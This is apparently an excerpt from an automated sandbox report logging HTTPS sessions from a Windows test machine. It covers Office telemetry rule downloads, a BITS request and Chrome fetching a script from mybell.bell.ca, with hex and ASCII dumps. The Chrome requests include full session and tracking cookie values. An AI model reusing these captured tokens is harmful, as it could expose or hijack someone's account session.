                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:57 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:56 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 472
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: d63b5638-a01e-0021-2ab4-27814c000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131156Z-16849878b78j7llf5vkyvvcehs0000000amg00000000e6he
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:57 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      41192.168.2.949768184.28.90.27443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:57 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                                                                      Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:57 UTC467INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                                      Server: ECAcc (lpl/EF70)
                                                                                                                                                                                                                                                                                                                                      X-CID: 11
                                                                                                                                                                                                                                                                                                                                      X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                                                                      X-Ms-Region: prod-neu-z1
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=185625
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:57 GMT
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      X-CID: 2


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      42192.168.2.94977313.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:57 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:58 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 478
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: d5dcea80-601e-0050-0829-2a2c9c000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131158Z-159b85dff8fq4v8mhC1DFW70kw00000001y000000000c4ks
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      43192.168.2.94977613.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:57 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:58 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 404
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 5e2f3c3f-901e-0048-1b49-28b800000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131158Z-17c5cb586f672xmrz843mf85fn00000008gg000000007unz
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      44192.168.2.94977213.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:57 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:58 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: f3394f62-601e-0070-07f3-2aa0c9000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131158Z-16849878b787wpl5wqkt5731b40000000adg0000000023dx
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      45192.168.2.94977413.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:58 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 479
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 395fbb66-201e-003f-4179-266d94000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131158Z-16849878b78sx229w7g7at4nkg00000007w0000000005kgy
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      46192.168.2.94977513.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:58 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 400
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: f5aa9a52-501e-0064-116a-271f54000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131158Z-17c5cb586f6wmhkn5q6fu8c5ss000000091g000000008918
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      47192.168.2.949783206.47.98.2074433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC2338OUTGET /static/bell_common.js?cache HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC1728INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:58 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                      Content-Length: 10205
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=3600, immutable
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; Path=/; Max-Age=1577847600; Domain=bell.ca; Secure
                                                                                                                                                                                                                                                                                                                                      Bell-Geo: 1
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b96806fe5c793a3730769749ad8989123b; Path=/; Domain=.bell.ca; Secure; HttpOnly;
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; path=/; domain=bell.ca; HttpOnly; Secure
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP409c8162028=08e8c5f15aab20004f4e8bad193df2f34a413776e2528f9f00ce95149f8d64cf7953590e67b89f850836241046113000dfda2c9e93dab3caf1b815a23a7dea6e52c94a29df57fe2c39281a962802db4638eaf7f0c303c4afa5ba830a9e009b6f; Path=/
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC10205INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 28 66 75 6e 63 74 69 6f 6e 28 62 6b 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 4b 3d 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 63 61 6c 6c 2e 62 69 6e 64 28 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 29 3b 76 61 72 20 6f 3d 5b 5d 3b 76 61 72 20 78 3d 5b 5d 3b 76 61 72 20 6c 3d 7b 74 6f 53 74 72 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 6f 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 74 68 69 73 29 3b 69 66 28 61 3e 3d 30 29 7b 72 65 74 75 72 6e 20 78 5b 61 5d 7d 72 65 74 75 72 6e 20 4b 28 74 68 69 73 29 7d 7d 3b 6c 2e 74 6f 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 3d 76 6f 69 64 20 30 3b 6f 3d 5b 6c 2e 74 6f 53 74 72 69 6e 67 5d 3b
                                                                                                                                                                                                                                                                                                                                      Data Ascii: (function(){(function(bk){"use strict";var K=Function.prototype.call.bind(Function.prototype.toString);var o=[];var x=[];var l={toString:function(){var a=o.lastIndexOf(this);if(a>=0){return x[a]}return K(this)}};l.toString.prototype=void 0;o=[l.toString];


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      48192.168.2.949781206.47.98.2074433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC2338OUTGET /static/bell_common.js?async HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
